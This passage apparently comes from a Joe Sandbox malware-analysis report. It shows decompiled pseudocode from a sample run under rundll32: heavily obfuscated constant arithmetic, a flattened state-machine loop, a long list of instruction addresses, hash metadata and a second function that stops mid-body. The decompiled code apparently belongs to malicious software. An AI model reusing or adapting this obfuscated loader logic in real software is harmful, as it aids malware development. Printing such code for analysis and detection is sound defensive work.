				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
				 *(_t426 + 0x94) = 0x40d4a3;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
				 *(_t426 + 0x20) = 0x8fc5ff;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
				 *(_t426 + 0x38) = 0x52431;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
				 *(_t426 + 0x44) = 0xc4652;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
				 *(_t426 + 0x10) = 0x2c06e;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
				 *(_t426 + 0x7c) = 0xc3ec9d;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
				 *(_t426 + 0x70) = 0x3416d6;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
				 *(_t426 + 0x64) = 0x1e8df6;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
				 *(_t426 + 0x28) = 0xebc79e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
				 *(_t426 + 0x4c) = 0x6795aa;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
				 *(_t426 + 0x50) = 0xbc4be8;
				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
				_t416 = 0x6f;
				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
				 *(_t426 + 0x94) = 0xde468f;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
				 *(_t426 + 0x18) = 0x6e4fa6;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
				 *(_t426 + 0x5c) = 0xc77145;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
				 *(_t426 + 0x44) = 0x492c53;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
				 *(_t426 + 0xa0) = 0x27589;
				_t417 = 0x3e;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
				 *(_t426 + 0x30) = 0xb4bbc8;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
				 *(_t426 + 0x28) = 0xdf5b34;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
				_t418 = 0x5e;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
				 *(_t426 + 0x90) = 0xff684d;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
				 *(_t426 + 0x20) = 0x90e304;
				_t419 = 0x7f;
				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
				 *(_t426 + 0x60) = 0xa4eb1a;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
				 *(_t426 + 0x34) = 0xdaab0d;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
				 *(_t426 + 0x68) = 0xbbaf5f;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
				_t372 =  *(_t426 + 0x6c);
				_t411 =  *(_t426 + 0x6c);
				_t424 =  *(_t426 + 0x6c);
				_t420 =  *(_t426 + 0x6c);
				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
				 *(_t426 + 0x74) = 0xfd4b1c;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
				 *(_t426 + 0x88) = 0xbb9d8e;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
				 *(_t426 + 0x3c) = 0x9303e6;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
				 *(_t426 + 0x80) = 0xaf4918;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
				 *(_t426 + 0x78) = 0xd8d1b1;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
				while(1) {
					L1:
					_t347 = 0xfb52c5;
					L2:
					while(_t374 != 0xd963e9) {
						if(_t374 == _t347) {
							_t350 = E007AC264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
							_t426 = _t426 + 0x2c;
							__eflags = _t350;
							if(_t350 == 0) {
								_t351 =  *(_t426 + 0xa0);
							} else {
								_t422 = _t411;
								while(1) {
									__eflags = _t422[1] - 4;
									if(_t422[1] != 4) {
										goto L20;
									}
									L19:
									_t355 = E0079B23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
									_t426 = _t426 + 0x10;
									__eflags = _t355;
									if(_t355 == 0) {
										_t351 = 1;
										 *(_t426 + 0xa0) = 1;
									} else {
										goto L20;
									}
									L25:
									_t420 =  *(_t426 + 0x6c);
									goto L26;
									L20:
									_t353 =  *_t422;
									__eflags = _t353;
									if(_t353 == 0) {
										_t351 =  *(_t426 + 0xa0);
									} else {
										_t422 = _t422 + _t353;
										__eflags = _t422[1] - 4;
										if(_t422[1] != 4) {
											goto L20;
										}
									}
									goto L25;
								}
							}
							L26:
							__eflags = _t351;
							if(__eflags == 0) {
								_t347 = 0xfb52c5;
								_t374 = 0xfb52c5;
								continue;
							} else {
								_t407 =  *0x7b3e0c; // 0x0
								E007A458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
								_t374 = 0xd963e9;
								goto L1;
							}
							L32:
						} else {
							if(_t374 == 0x247652d) {
								_t360 = E00798F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
								_t372 = _t360;
								_t426 = _t426 + 0x28;
								__eflags = _t360 - 0xffffffff;
								if(__eflags != 0) {
									_t374 = 0x7db0050;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								}
							} else {
								if(_t374 == 0x4334ccc) {
									E007ADA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
									_t364 = E0079B6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
									_t424 = _t364;
									_t426 = _t426 + 0x18;
									_t374 = 0x247652d;
									 *((short*)(_t364 - 2)) = 0;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								} else {
									if(_t374 == 0x7db0050) {
										_t420 = 0x1000;
										_push(_t374);
										_push(_t374);
										 *(_t426 + 0x74) = 0x1000;
										_t411 = E00797FF2(0x1000);
										_t347 = 0xfb52c5;
										__eflags = _t411;
										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
										continue;
									} else {
										if(_t374 == 0xebf23c2) {
											_t374 = 0x4334ccc;
											continue;
										} else {
											if(_t374 != 0xf828486) {
												L30:
												__eflags = _t374 - 0x24bb42a;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E007A1E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
											}
										}
									}
								}
							}
						}
						return 0;
						goto L32;
					}
					E007A8519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
					_t374 = 0xf828486;
					_t347 = 0xfb52c5;
					goto L30;
				}
			}






















                                                                                                                          0x007981bd
                                                                                                                          0x007981c7
                                                                                                                          0x007981cf
                                                                                                                          0x007981d4
                                                                                                                          0x007981dc
                                                                                                                          0x007981e4
                                                                                                                          0x007981f3
                                                                                                                          0x007981f8
                                                                                                                          0x007981fe
                                                                                                                          0x00798206
                                                                                                                          0x0079820e
                                                                                                                          0x00798219
                                                                                                                          0x00798224
                                                                                                                          0x0079822f
                                                                                                                          0x00798237
                                                                                                                          0x0079823c
                                                                                                                          0x00798241
                                                                                                                          0x00798246
                                                                                                                          0x0079824e
                                                                                                                          0x0079825b
                                                                                                                          0x0079825c
                                                                                                                          0x00798264
                                                                                                                          0x00798268
                                                                                                                          0x00798270
                                                                                                                          0x00798278
                                                                                                                          0x00798280
                                                                                                                          0x0079828e
                                                                                                                          0x00798292
                                                                                                                          0x0079829a
                                                                                                                          0x007982a2
                                                                                                                          0x007982aa
                                                                                                                          0x007982af
                                                                                                                          0x007982b7
                                                                                                                          0x007982c2
                                                                                                                          0x007982ca
                                                                                                                          0x007982d5
                                                                                                                          0x007982dd
                                                                                                                          0x007982e2
                                                                                                                          0x007982ea
                                                                                                                          0x007982f2
                                                                                                                          0x007982fa
                                                                                                                          0x00798307
                                                                                                                          0x0079830b
                                                                                                                          0x00798313
                                                                                                                          0x0079831b
                                                                                                                          0x00798323
                                                                                                                          0x0079832b
                                                                                                                          0x00798333
                                                                                                                          0x00798338
                                                                                                                          0x00798340
                                                                                                                          0x00798348
                                                                                                                          0x00798355
                                                                                                                          0x00798359
                                                                                                                          0x00798361
                                                                                                                          0x00798369
                                                                                                                          0x00798371
                                                                                                                          0x00798376
                                                                                                                          0x0079837e
                                                                                                                          0x00798386
                                                                                                                          0x0079838b
                                                                                                                          0x00798393
                                                                                                                          0x0079839b
                                                                                                                          0x007983a8
                                                                                                                          0x007983ac
                                                                                                                          0x007983b4
                                                                                                                          0x007983bc
                                                                                                                          0x007983c6
                                                                                                                          0x007983ce
                                                                                                                          0x007983d6
                                                                                                                          0x007983de
                                                                                                                          0x007983e6
                                                                                                                          0x007983eb
                                                                                                                          0x007983f3
                                                                                                                          0x007983fb
                                                                                                                          0x00798403
                                                                                                                          0x00798412
                                                                                                                          0x00798415
                                                                                                                          0x00798419
                                                                                                                          0x00798421
                                                                                                                          0x0079842c
                                                                                                                          0x00798437
                                                                                                                          0x00798442
                                                                                                                          0x0079844a
                                                                                                                          0x0079844f
                                                                                                                          0x00798457
                                                                                                                          0x0079845f
                                                                                                                          0x00798467
                                                                                                                          0x0079846f
                                                                                                                          0x0079847f
                                                                                                                          0x00798483
                                                                                                                          0x0079848b
                                                                                                                          0x00798493
                                                                                                                          0x0079849b
                                                                                                                          0x007984a0
                                                                                                                          0x007984a8
                                                                                                                          0x007984bb
                                                                                                                          0x007984be
                                                                                                                          0x007984c5
                                                                                                                          0x007984d0
                                                                                                                          0x007984e0
                                                                                                                          0x007984e4
                                                                                                                          0x007984ec
                                                                                                                          0x007984f4
                                                                                                                          0x007984fc
                                                                                                                          0x00798504
                                                                                                                          0x00798510
                                                                                                                          0x00798515
                                                                                                                          0x0079851b
                                                                                                                          0x00798520
                                                                                                                          0x00798528
                                                                                                                          0x00798533
                                                                                                                          0x0079853e
                                                                                                                          0x00798549
                                                                                                                          0x00798555
                                                                                                                          0x00798558
                                                                                                                          0x0079855c
                                                                                                                          0x00798561
                                                                                                                          0x00798566
                                                                                                                          0x0079856e
                                                                                                                          0x00798576
                                                                                                                          0x00798580
                                                                                                                          0x00798584
                                                                                                                          0x0079858c
                                                                                                                          0x00798594
                                                                                                                          0x00798599
                                                                                                                          0x007985a1
                                                                                                                          0x007985a6
                                                                                                                          0x007985ae
                                                                                                                          0x007985b6
                                                                                                                          0x007985c0
                                                                                                                          0x007985c4
                                                                                                                          0x007985c8
                                                                                                                          0x007985cc
                                                                                                                          0x007985d0
                                                                                                                          0x007985d4
                                                                                                                          0x007985dc
                                                                                                                          0x007985e4
                                                                                                                          0x007985ec
                                                                                                                          0x007985f4
                                                                                                                          0x00798607
                                                                                                                          0x0079860e
                                                                                                                          0x00798619
                                                                                                                          0x00798621
                                                                                                                          0x00798626
                                                                                                                          0x00798633
                                                                                                                          0x00798637
                                                                                                                          0x0079863f
                                                                                                                          0x0079864a
                                                                                                                          0x00798655
                                                                                                                          0x00798660
                                                                                                                          0x0079866d
                                                                                                                          0x00798671
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00000000
                                                                                                                          0x0079867e
                                                                                                                          0x0079868c
                                                                                                                          0x00798806
                                                                                                                          0x0079880b
                                                                                                                          0x0079880e
                                                                                                                          0x00798810
                                                                                                                          0x00798854
                                                                                                                          0x00798812
                                                                                                                          0x00798812
                                                                                                                          0x00798814
                                                                                                                          0x00798814
                                                                                                                          0x00798818
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079881a
                                                                                                                          0x00798832
                                                                                                                          0x00798837
                                                                                                                          0x0079883a
                                                                                                                          0x0079883c
                                                                                                                          0x0079884a
                                                                                                                          0x0079884b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00798864
                                                                                                                          0x00798864
                                                                                                                          0x00000000
                                                                                                                          0x0079883e
                                                                                                                          0x0079883e
                                                                                                                          0x00798840
                                                                                                                          0x00798842
                                                                                                                          0x0079885d
                                                                                                                          0x00798844
                                                                                                                          0x00798844
                                                                                                                          0x00798814
                                                                                                                          0x00798818
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00798818
                                                                                                                          0x00000000
                                                                                                                          0x00798842
                                                                                                                          0x00798814
                                                                                                                          0x00798868
                                                                                                                          0x00798868
                                                                                                                          0x0079886a
                                                                                                                          0x0079888d
                                                                                                                          0x00798892
                                                                                                                          0x00000000
                                                                                                                          0x0079886c
                                                                                                                          0x00798870
                                                                                                                          0x0079887d
                                                                                                                          0x00798883
                                                                                                                          0x00000000
                                                                                                                          0x00798883
                                                                                                                          0x00000000
                                                                                                                          0x00798692
                                                                                                                          0x00798698
                                                                                                                          0x007987b9
                                                                                                                          0x007987be
                                                                                                                          0x007987c0
                                                                                                                          0x007987c3
                                                                                                                          0x007987c6
                                                                                                                          0x007987cc
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00000000
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x0079869e
                                                                                                                          0x007986a4
                                                                                                                          0x0079874a
                                                                                                                          0x00798765
                                                                                                                          0x0079876a
                                                                                                                          0x0079876c
                                                                                                                          0x00798771
                                                                                                                          0x00798776
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00000000
                                                                                                                          0x00798679
                                                                                                                          0x007986aa
                                                                                                                          0x007986b0
                                                                                                                          0x007986ff
                                                                                                                          0x0079870e
                                                                                                                          0x0079870f
                                                                                                                          0x00798710
                                                                                                                          0x0079871a
                                                                                                                          0x0079871c
                                                                                                                          0x00798722
                                                                                                                          0x00798729
                                                                                                                          0x00000000
                                                                                                                          0x007986b2
                                                                                                                          0x007986b8
                                                                                                                          0x007986f4
                                                                                                                          0x00000000
                                                                                                                          0x007986ba
                                                                                                                          0x007986c0
                                                                                                                          0x007988b2
                                                                                                                          0x007988b2
                                                                                                                          0x007988b8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007988be
                                                                                                                          0x007986c6
                                                                                                                          0x007986dd
                                                                                                                          0x007986e2
                                                                                                                          0x007986c0
                                                                                                                          0x007986b8
                                                                                                                          0x007986b0
                                                                                                                          0x007986a4
                                                                                                                          0x00798698
                                                                                                                          0x007986f1
                                                                                                                          0x00000000
                                                                                                                          0x007986f1
                                                                                                                          0x007988a2
                                                                                                                          0x007988a8
                                                                                                                          0x007988ad
                                                                                                                          0x00000000
                                                                                                                          0x007988ad

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                          • API String ID: 0-1837206032
                                                                                                                          • Opcode ID: a6ebbe10d6c9e5c934b6c191451ab6ece629bcfefee9ac55846a48cf8a9f39ce
                                                                                                                          • Instruction ID: 1255439cfa22f6731b2b69349b8b4597b76837b0087b9a4c75a842979bc25a6c
                                                                                                                          • Opcode Fuzzy Hash: a6ebbe10d6c9e5c934b6c191451ab6ece629bcfefee9ac55846a48cf8a9f39ce
                                                                                                                          • Instruction Fuzzy Hash: E50231711083809FD7A8CF25C48AA5BBBE1FBC5758F508A1DF1DA86260DBB48949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007ACB5B Relevance: 9.1, Strings: 7, Instructions: 335COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E007ACB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t341;
				void* _t370;
				void* _t379;
				intOrPtr _t382;
				intOrPtr _t385;
				void* _t396;
				intOrPtr _t399;
				intOrPtr _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int* _t449;

				_push(_a12);
				_t436 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E007A20B9(_t341);
				_v1572 = 0xe82680;
				_t449 =  &(( &_v1708)[5]);
				_v1568 = 0;
				_v1564 = 0;
				_t396 = 0x9368da1;
				_v1584 = 0x42403b;
				_v1584 = _v1584 + 0xffffd771;
				_v1584 = _v1584 ^ 0x00421785;
				_v1692 = 0xc00255;
				_t437 = 0x16;
				_v1692 = _v1692 / _t437;
				_v1692 = _v1692 + 0xffff6b87;
				_v1692 = _v1692 + 0xffff176e;
				_v1692 = _v1692 ^ 0x0004c90f;
				_v1668 = 0x5abcaa;
				_v1668 = _v1668 | 0xa6adf3e3;
				_v1668 = _v1668 + 0xffff713c;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 ^ 0xbfd49dc8;
				_v1700 = 0xb35187;
				_v1700 = _v1700 | 0x50a44dff;
				_v1700 = _v1700 + 0xfffff2e6;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 ^ 0x0051b9c1;
				_v1644 = 0x4d7cc3;
				_v1644 = _v1644 + 0xffffa786;
				_v1644 = _v1644 | 0x8b8a715e;
				_v1644 = _v1644 ^ 0x6234f021;
				_v1644 = _v1644 ^ 0xe9f998a6;
				_v1624 = 0x204c5b;
				_v1624 = _v1624 + 0xffffa901;
				_v1624 = _v1624 + 0x49e1;
				_v1624 = _v1624 ^ 0x002fe6aa;
				_v1632 = 0xbb0a9b;
				_v1632 = _v1632 * 0x52;
				_v1632 = _v1632 | 0x83893080;
				_v1632 = _v1632 ^ 0xbbe905c0;
				_v1620 = 0x19fb1a;
				_v1620 = _v1620 | 0x985eae3d;
				_v1620 = _v1620 + 0xf613;
				_v1620 = _v1620 ^ 0x9864c971;
				_v1656 = 0x35ecb4;
				_v1656 = _v1656 * 0x29;
				_v1656 = _v1656 + 0x1081;
				_v1656 = _v1656 + 0xffffd324;
				_v1656 = _v1656 ^ 0x08a8fe56;
				_v1580 = 0xc60f6f;
				_v1580 = _v1580 + 0xffffd3e6;
				_v1580 = _v1580 ^ 0x00c233ea;
				_v1664 = 0x2df5c;
				_v1664 = _v1664 << 8;
				_v1664 = _v1664 * 0x4c;
				_v1664 = _v1664 + 0xffffaed7;
				_v1664 = _v1664 ^ 0xda40187b;
				_v1672 = 0x38409b;
				_v1672 = _v1672 * 0x33;
				_v1672 = _v1672 | 0x7fcdffbb;
				_v1672 = _v1672 ^ 0x7ff87770;
				_v1680 = 0xe751cb;
				_v1680 = _v1680 ^ 0x8590ed7d;
				_v1680 = _v1680 + 0xffffebc9;
				_v1680 = _v1680 * 0x5e;
				_v1680 = _v1680 ^ 0x01e2719c;
				_v1688 = 0x15e1cd;
				_v1688 = _v1688 + 0xfe19;
				_v1688 = _v1688 + 0xffffc88c;
				_v1688 = _v1688 << 7;
				_v1688 = _v1688 ^ 0x0b5f3deb;
				_v1696 = 0x33a377;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xfb2d04b5;
				_v1696 = _v1696 | 0xd2f07883;
				_v1696 = _v1696 ^ 0xf7fa7ce3;
				_v1640 = 0x94004d;
				_v1640 = _v1640 >> 0xa;
				_t438 = 0x67;
				_v1640 = _v1640 * 0x3d;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x00039ca1;
				_v1648 = 0xfcfef3;
				_v1648 = _v1648 * 0x18;
				_v1648 = _v1648 + 0x9c71;
				_v1648 = _v1648 | 0xf5d6202a;
				_v1648 = _v1648 ^ 0xf7f57601;
				_v1596 = 0xc58f80;
				_v1596 = _v1596 + 0xffff2f17;
				_v1596 = _v1596 ^ 0x00ce700d;
				_v1684 = 0xee980b;
				_v1684 = _v1684 >> 6;
				_v1684 = _v1684 / _t438;
				_v1684 = _v1684 + 0xffff2a3f;
				_v1684 = _v1684 ^ 0xfff3655c;
				_v1652 = 0x45a4a9;
				_v1652 = _v1652 >> 0xe;
				_t439 = 0x6e;
				_v1652 = _v1652 * 0x51;
				_v1652 = _v1652 + 0x9be3;
				_v1652 = _v1652 ^ 0x0004d4d8;
				_v1708 = 0x222243;
				_t176 =  &_v1708; // 0x222243
				_v1708 =  *_t176 / _t439;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xffff4a12;
				_v1708 = _v1708 ^ 0x009b5339;
				_v1612 = 0x464ea3;
				_v1612 = _v1612 + 0x89cc;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 ^ 0x00167067;
				_v1588 = 0xd74d9e;
				_v1588 = _v1588 | 0x529da741;
				_v1588 = _v1588 ^ 0x52d09c78;
				_v1628 = 0x60b5eb;
				_v1628 = _v1628 >> 9;
				_t440 = 0x19;
				_v1628 = _v1628 / _t440;
				_v1628 = _v1628 ^ 0x000ff1bc;
				_v1676 = 0xfb7b01;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffffc28e;
				_t441 = 0x1b;
				_v1676 = _v1676 / _t441;
				_v1676 = _v1676 ^ 0x0096cb21;
				_v1660 = 0xed67c1;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 | 0xef7d69c8;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 ^ 0xfff42fe1;
				_v1604 = 0x46c7e8;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x63fe3710;
				_v1636 = 0x7a345b;
				_v1636 = _v1636 + 0xd479;
				_v1636 = _v1636 + 0x8c7f;
				_v1636 = _v1636 ^ 0x00708a00;
				_v1704 = 0x80508e;
				_v1704 = _v1704 ^ 0xf958081f;
				_t442 = 0x4b;
				_v1704 = _v1704 / _t442;
				_t443 = 0x34;
				_v1704 = _v1704 * 0x44;
				_v1704 = _v1704 ^ 0xe2885afb;
				_v1576 = 0x325f4f;
				_t259 =  &_v1576; // 0x325f4f
				_v1576 =  *_t259 * 0x7a;
				_v1576 = _v1576 ^ 0x180920ed;
				_v1592 = 0xd554f9;
				_v1592 = _v1592 * 0x4e;
				_v1592 = _v1592 ^ 0x40f8e8dd;
				_v1608 = 0x6be570;
				_v1608 = _v1608 + 0x3d4f;
				_v1608 = _v1608 ^ 0x4461575c;
				_v1608 = _v1608 ^ 0x440eeedf;
				_v1616 = 0x4acfbf;
				_v1616 = _v1616 / _t443;
				_t444 = 0xe;
				_v1616 = _v1616 / _t444;
				_v1616 = _v1616 ^ 0x000fdd65;
				_v1600 = 0x55de88;
				_v1600 = _v1600 << 2;
				_v1600 = _v1600 ^ 0x01580110;
				do {
					while(_t396 != 0x196a97b) {
						if(_t396 == 0x2ca432c) {
							_push(_v1652);
							_push(_v1684);
							_t379 = E007ADCF7(_v1596, 0x7910f0, __eflags);
							E007A176B( &_v1560, __eflags);
							_t382 =  *0x7b3e10; // 0x0
							_t385 =  *0x7b3e10; // 0x0
